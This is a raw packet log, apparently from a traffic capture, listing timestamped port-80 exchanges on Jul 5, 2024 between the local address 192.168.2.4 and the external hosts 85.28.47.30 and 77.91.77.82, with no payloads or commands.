                                                                Jul 5, 2024 04:23:17.555768967 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555785894 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555797100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555809021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555819035 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555835962 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555855036 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555866003 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555876970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555886030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.555905104 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.555922985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.556708097 CEST804974777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:17.556767941 CEST4974780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.556793928 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:17.556857109 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.556968927 CEST4974880192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:17.559701920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.559751034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.559797049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.559808016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.559844017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.559868097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.559879065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.559889078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.559916973 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.559932947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.559957981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560035944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560045958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560055017 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560076952 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560084105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560096025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560105085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560125113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560136080 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560224056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560235023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560245037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560255051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560266018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560271025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560276031 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560286999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560292006 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560300112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560309887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560312986 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560323954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560324907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560348034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560350895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560369968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560369968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560383081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560390949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560394049 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560404062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560411930 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560421944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560421944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560431957 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560435057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560445070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560451031 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560456038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560466051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560472012 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560476065 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560488939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560492992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560506105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560508013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560520887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560522079 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560532093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560543060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560549974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560559988 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560564995 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560574055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560574055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560591936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560597897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560611010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560621023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560621977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560632944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560633898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560646057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560652971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560657978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560669899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560677052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560681105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560691118 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560698032 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560703039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560714006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560720921 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560725927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560726881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560755014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560775042 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.560951948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.560962915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561001062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561045885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561058044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561068058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561084032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561094999 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561094999 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561106920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561109066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561120033 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561131001 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561131954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561141968 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561148882 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561163902 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561181068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561191082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561192036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561206102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561223030 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561225891 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561250925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561268091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561271906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561283112 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561292887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561302900 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561312914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561319113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561326027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.561341047 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561350107 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561374903 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.561961889 CEST804974877.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:17.562711954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.562721014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.562731981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.562750101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.562757969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.562762022 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.562774897 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.562786102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.562800884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.562823057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.645822048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.645895004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.645896912 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.645906925 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.645934105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.645935059 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.645946980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.645956039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.645962954 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.645967007 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.645981073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646011114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646013021 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646094084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646133900 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646172047 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646183014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646190882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646200895 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646209955 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646220922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646231890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646233082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646259069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646276951 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646306038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646317005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646343946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646354914 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646442890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646454096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646462917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646473885 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646480083 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646485090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646497011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646502972 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646507978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646524906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646548033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646651983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646662951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646672010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646692991 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646708965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646773100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646784067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646792889 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646802902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646812916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646816969 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646825075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646836996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646837950 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646846056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.646857023 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646868944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.646889925 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.650707006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650753975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650764942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650834084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650846004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650856018 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650866985 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650868893 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.650881052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650909901 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650909901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.650922060 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650929928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.650933027 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650953054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650959015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.650964975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650974989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.650976896 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.650995016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651001930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651005983 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651020050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651026964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651031017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651042938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651050091 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651070118 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651082039 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651124954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651143074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651154041 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651164055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651164055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651177883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651177883 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651189089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651190996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651201010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651204109 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651211977 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651221037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651225090 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651248932 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651263952 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651273966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651283979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651293993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651314974 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651316881 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651325941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651335955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651340008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651349068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651364088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651365042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651377916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651386976 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651391029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651401997 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651411057 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651421070 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651427984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651431084 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651449919 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651473045 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651493073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651504993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651513100 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651529074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651530027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651540995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651551962 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651555061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651562929 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651576996 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651603937 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651658058 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651669025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651684046 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651693106 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651706934 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651711941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651714087 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651721954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651731014 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651741028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651746035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651757956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651761055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651770115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651771069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651782036 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651793003 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651797056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651808023 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651818037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651827097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651830912 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651839018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651843071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651853085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651885033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651901960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651912928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651922941 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651932955 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651952028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651957989 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651958942 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.651968956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651979923 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651990891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.651995897 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.652002096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.652015924 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.652044058 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.653369904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653381109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653392076 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653417110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.653434992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.653450012 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653460979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653470993 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653481960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653495073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.653522968 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.653546095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:17.653582096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:17.736782074 CEST804973285.28.47.30192.168.2.4
